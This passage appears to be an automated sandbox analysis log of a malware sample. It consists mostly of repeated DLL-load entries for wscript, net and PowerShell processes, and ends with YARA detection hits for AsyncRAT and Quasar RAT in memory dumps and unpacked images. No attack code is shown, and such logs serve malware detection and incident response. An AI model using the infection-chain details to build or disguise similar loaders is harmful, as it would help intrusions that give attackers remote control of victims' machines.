              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\net1.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\net1.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 22.2.RegSvcs.exe.3f95168.0.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 22.2.RegSvcs.exe.7230000.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000016.00000002.4626854201.0000000005247000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000016.00000002.4523483443.0000000001029000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
